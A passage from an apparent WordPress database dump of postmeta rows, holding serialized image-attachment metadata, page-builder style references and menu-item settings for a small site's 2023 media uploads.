;a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1786,182,'_edit_last','1'),(1788,1388,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:229:{i:0;i:407;i:1;i:510;i:2;i:511;i:3;i:512;i:4;i:513;i:5;i:514;i:6;i:515;i:7;i:516;i:8;i:517;i:9;i:518;i:10;i:512;i:11;i:513;i:12;i:514;i:13;i:515;i:14;i:516;i:15;i:517;i:16;i:520;i:17;i:512;i:18;i:513;i:19;i:514;i:20;i:515;i:21;i:516;i:22;i:517;i:23;i:518;i:24;i:512;i:25;i:513;i:26;i:514;i:27;i:515;i:28;i:516;i:29;i:517;i:30;i:519;i:31;i:512;i:32;i:513;i:33;i:514;i:34;i:515;i:35;i:516;i:36;i:517;i:37;i:521;i:38;i:512;i:39;i:513;i:40;i:514;i:41;i:515;i:42;i:516;i:43;i:517;i:44;i:518;i:45;i:512;i:46;i:513;i:47;i:514;i:48;i:515;i:49;i:516;i:50;i:517;i:51;i:518;i:52;i:512;i:53;i:513;i:54;i:514;i:55;i:515;i:56;i:516;i:57;i:517;i:58;i:518;i:59;i:512;i:60;i:513;i:61;i:514;i:62;i:515;i:63;i:516;i:64;i:517;i:65;i:518;i:66;i:522;i:67;i:523;i:68;i:524;i:69;i:605;i:70;i:606;i:71;i:607;i:72;i:608;i:73;i:609;i:74;i:610;i:75;i:611;i:76;i:612;i:77;i:613;i:78;i:607;i:79;i:608;i:80;i:609;i:81;i:610;i:82;i:611;i:83;i:612;i:84;i:614;i:85;i:607;i:86;i:608;i:87;i:609;i:88;i:610;i:89;i:611;i:90;i:612;i:91;i:615;i:92;i:607;i:93;i:608;i:94;i:609;i:95;i:610;i:96;i:611;i:97;i:612;i:98;i:616;i:99;i:607;i:100;i:608;i:101;i:609;i:102;i:610;i:103;i:611;i:104;i:612;i:105;i:613;i:106;i:607;i:107;i:608;i:108;i:609;i:109;i:610;i:110;i:611;i:111;i:612;i:112;i:613;i:113;i:607;i:114;i:608;i:115;i:609;i:116;i:610;i:117;i:611;i:118;i:612;i:119;i:613;i:120;i:607;i:121;i:608;i:122;i:609;i:123;i:610;i:124;i:611;i:125;i:612;i:126;i:613;i:127;i:607;i:128;i:608;i:129;i:609;i:130;i:610;i:131;i:611;i:132;i:612;i:133;i:613;i:134;i:607;i:135;i:608;i:136;i:609;i:137;i:610;i:138;i:611;i:139;i:612;i:140;i:613;i:141;i:607;i:142;i:608;i:143;i:609;i:144;i:610;i:145;i:611;i:146;i:612;i:147;i:613;i:148;i:607;i:149;i:608;i:150;i:609;i:151;i:610;i:152;i:611;i:153;i:612;i:154;i:613;i:155;i:607;i:156;i:608;i:157;i:609;i:158;i:610;i:159;i:611;i:160;i:612;i:161;i:607;i:162;i:608;i:163;i:609;i:164;i:610;i:165;i:611;i:166;i:612;i:167;i:613;i:168;i:701;i:169;i:702;i:170;i:707;i:171;i:704;i:172;i:710;i:173;i:709;i:174;i:703;i:175;i:617;i:176;i:618;i:177;i:619;i:178;i:626;i:179;i:627;i:180;i:628;i:181;i:629;i:182;i:630;i:183;i:631;i:184;i:632;i:185;i:633;i:186;i:634;i:187;i:628;i:188;i:629;i:189;i:630;i:190;i:631;i:191;i:632;i:192;i:633;i:193;i:635;i:194;i:628;i:195;i:629;i:196;i:630;i:197;i:631;i:198;i:632;i:199;i:633;i:200;i:636;i:201;i:628;i:202;i:629;i:203;i:630;i:204;i:631;i:205;i:632;i:206;i:633;i:207;i:637;i:208;i:628;i:209;i:629;i:210;i:630;i:211;i:631;i:212;i:632;i:213;i:633;i:214;i:634;i:215;i:638;i:216;i:639;i:217;i:640;i:218;i:680;i:219;i:681;i:220;i:683;i:221;i:684;i:222;i:694;i:223;i:695;i:224;i:700;i:225;i:699;i:226;i:696;i:227;i:697;i:228;i:698;}}}'),(1792,1391,'_wp_attached_file','2023/09/cropped-patterson.jpg'),(1793,1391,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:29:\"2023/09/cropped-patterson.jpg\";s:8:\"filesize\";i:15371;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"cropped-patterson-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15371;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"cropped-patterson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4732;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1794,1391,'_oembed_f9e10b252ff261d20f35d96b1e6edb19','{{unknown}}'),(1801,1394,'_wp_attached_file','2023/09/Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png'),(1802,1394,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:63:\"2023/09/Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\";s:8:\"filesize\";i:468023;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207175304-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:131434;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207175304-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37867;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1806,1369,'_edit_lock','1695781040:1'),(1807,1369,'_wp_attachment_backup_sizes','a:9:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:810;s:6:\"height\";i:1080;s:4:\"file\";s:9:\"bayo.jpeg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:17:\"bayo-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5101;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:17:\"bayo-225x300.jpeg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12339;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:18:\"bayo-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107494;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:18:\"bayo-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107494;}s:18:\"full-1695781168350\";a:3:{s:5:\"width\";i:810;s:6:\"height\";i:810;s:4:\"file\";s:24:\"bayo-e1695778821230.jpeg\";}s:23:\"thumbnail-1695781168350\";a:5:{s:4:\"file\";s:32:\"bayo-e1695778821230-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5222;}s:20:\"medium-1695781168350\";a:5:{s:4:\"file\";s:32:\"bayo-e1695778821230-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16335;}s:26:\"medium_large-1695781168350\";a:5:{s:4:\"file\";s:32:\"bayo-e1695778821230-768x768.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83924;}}'),(1814,1369,'_edit_last','1'),(1818,1399,'_wp_attached_file','2023/09/sara-edwards1.jpg'),(1819,1399,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:25:\"2023/09/sara-edwards1.jpg\";s:8:\"filesize\";i:963488;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"sara-edwards1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15497;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"sara-edwards1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102253;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"sara-edwards1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8104;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"sara-edwards1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61091;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS M50m2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1662479582\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1828,1408,'_wp_attached_file','2023/09/Portrait-1.jpeg'),(1829,1408,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:23:\"2023/09/Portrait-1.jpeg\";s:8:\"filesize\";i:67381;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Portrait-1-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11235;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Portrait-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5444;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1848,1416,'_wp_attached_file','2023/09/rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg'),(1849,1416,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:2328;s:4:\"file\";s:73:\"2023/09/rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\";s:8:\"filesize\";i:140655;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:73:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8676;}s:5:\"large\";a:5:{s:4:\"file\";s:74:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-769x1024.jpg\";s:5:\"width\";i:769;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60470;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:73:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4097;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:74:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60076;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:75:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120565;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:75:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-1538x2048.jpg\";s:5:\"width\";i:1538;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192327;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1850,1417,'_wp_attached_file','2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg'),(1851,1417,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:96:\"2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\";s:8:\"filesize\";i:179176;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:96:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10547;}s:5:\"large\";a:5:{s:4:\"file\";s:98:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78078;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:96:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4097;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:96:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47828;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:98:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152430;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1852,1417,'_oembed_140be3c5637645a4fa18fadb21e68562','{{unknown}}'),(1853,1418,'_wp_attached_file','2023/09/colibri-image-54.png'),(1854,1418,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:28:\"2023/09/colibri-image-54.png\";s:8:\"filesize\";i:6768;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1855,1419,'_wp_attached_file','2023/09/colibri-image-55.png'),(1856,1419,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:28:\"2023/09/colibri-image-55.png\";s:8:\"filesize\";i:8695;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1857,1420,'_wp_attached_file','2023/09/colibri-image-56.png'),(1858,1420,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:28:\"2023/09/colibri-image-56.png\";s:8:\"filesize\";i:7209;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1863,138,'_wp_old_date','2022-04-29'),(1865,619,'_wp_old_date','2022-04-29'),(1867,183,'_wp_old_date','2022-04-29'),(1868,186,'_wp_old_date','2022-04-29'),(1873,1422,'extend_builder','a:2:{s:4:\"json\";i:612;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:413;i:1;i:417;i:2;i:418;i:3;i:419;i:4;i:420;}}}'),(1874,1423,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1875,1424,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1876,1425,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1877,1426,'_menu_item_type','post_type'),(1878,1426,'_menu_item_menu_item_parent','0'),(1879,1426,'_menu_item_object_id','126'),(1880,1426,'_menu_item_object','page'),(1881,1426,'_menu_item_target',''),(1882,1426,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1883,1426,'_menu_item_xfn',''),(1884,1426,'_menu_item_url',''),(1887,1427,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1888,1428,'extend_builder','a:2:{s:4:\"json\";i:612;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:413;i:1;i:417;i:2;i:418;i:3;i:419;i:4;i:420;}}}'),(1889,1430,'is_colibri-wp_front_page','1'),(1890,1430,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1892,1434,'extend_builder','a:2:{s:4:\"json\";i:612;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:413;i:1;i:417;i:2;i:418;i:3;i:419;i:4;i:420;}}}'),(1893,1436,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:37:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:679;i:31;i:220;i:32;i:221;i:33;i:222;i:34;i:223;i:35;i:224;i:36;i:225;}}}'),(1899,1443,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1904,1448,'_wp_attached_file','2023/09/tornado1.png'),(1905,1448,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:333;s:6:\"height\";i:480;s:4:\"file\";s:20:\"2023/09/tornado1.png\";s:8:\"filesize\";i:336449;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"tornado1-208x300.png\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:123636;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"tornado1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48311;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1906,1449,'_wp_attached_file','2023/09/cropped-tornado1.png'),(1907,1449,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:333;s:6:\"height\";i:333;s:4:\"file\";s:28:\"2023/09/cropped-tornado1.png\";s:8:\"filesize\";i:217946;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"cropped-tornado1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:167968;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"cropped-tornado1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47176;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1909,1451,'_wp_attached_file','2023/09/tornado.jpg'),(1910,1451,'_wp_atta